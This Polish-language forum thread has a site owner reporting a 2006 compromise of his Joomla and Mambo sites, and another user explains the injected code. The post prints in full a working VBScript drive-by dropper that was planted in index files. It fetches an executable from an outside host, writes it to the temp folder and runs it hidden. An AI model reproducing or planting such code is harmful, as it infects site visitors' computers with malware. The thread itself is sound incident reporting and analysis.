Włam na Joomla 1.0.11 i Mambo 4.5.4
Wyniki 1 do 2 z 2

Temat: Włam na Joomla 1.0.11 i Mambo 4.5.4

  1. #1
    Debiutant
    Dołączył
    15-08-2006
    Wpisy
    10
    Punkty
    10

    Włam na Joomla 1.0.11 i Mambo 4.5.4

    Witam
    W piątek 13.10.2006 zauważyłem naruszenie bezpieczeństwa witryn opartych na Joomla 1.0.11 i Mambo 4.5.4. Atak polegął na dopisaniu do wszystkich plików w katalogach root (/) i /administrator zawierających w nazwie "index" kodu:
    Kod:
    <title></title>
        <head></head>
        <body>
        <script language="VBScript">
        on error resume next
        ' due to how ajax works, the file MUST be within the same local domain
    
        dl =  "http://www.55man.com/file/mau7du8889iwnuykdpqmkcjklqwenzxgdb/AdMin.exe"
    
    ' create adodbstream object
        Set df = document.createElement("object")
        df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        str="Microsoft.XMLHTTP"
        Set x = df.CreateObject(str,"")
        a1="Ado"
        a2="db."
        a3="Str"
        a4="eam"
        str1=a1&a2&a3&a4
        str5=str1
        set S = df.createobject(str5,"")
        S.type = 1
        ' xml ajax req
        str6="GET"
        x.Open str6, dl, False
        x.Send
        ' Get temp directory and create our destination name
        fname1="bl4ck.com"
        set F = df.createobject("Scripting.FileSystemObject","")
        set tmp = F.GetSpecialFolder(2) ' Get tmp folder
        fname1= F.BuildPath(tmp,fname1)
        S.open
        ' open adodb stream and write contents of request to file
        ' like vbs dl+exec code
        S.write x.responseBody
        ' Saves it with CreateOverwrite flag
        S.savetofile fname1,2
        S.close
        set Q = df.createobject("Shell.Application","")
        Q.ShellExecute fname1,"","","open",0
        </script>
        <head>
        <title>[BL4CK] || 404 Not Found</title>
        </head><body>
        <h1><hr>
        <!-- <script>location.href='http://google.com'</script> -->
        </body>
        </html>
    Kod dopisany został na końcu kazdego pliku index*.php i na początku każdego pliku index*.html w ww. katalogach. Skutkiem czego w momencie wejścia na stronę przy pomocy IE Norton Internet Security "krzyczał" o próbie zainstalowania trojana. Listing powyżej wskazuje na Visual Basic, którego nie znam więc może ktoś z was go odczyta i powie co, oprócz załadowania *.exe, wykonuje ten skrypt.
    Jeszcze nie wiem jak do tego doszło. Czy ktoś z Was miał podobny problem?
    Ostanio edytowane przez lechu_b : 17-10-2006 00:27

  2. #2
    Wyjadacz nexus246 awatar
    Dołączył
    23-09-2005
    Wpisy
    664
    Punkty
    20

    Domyślny

    Ten skrypt ściąga do tempa i odpala plik exe.

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •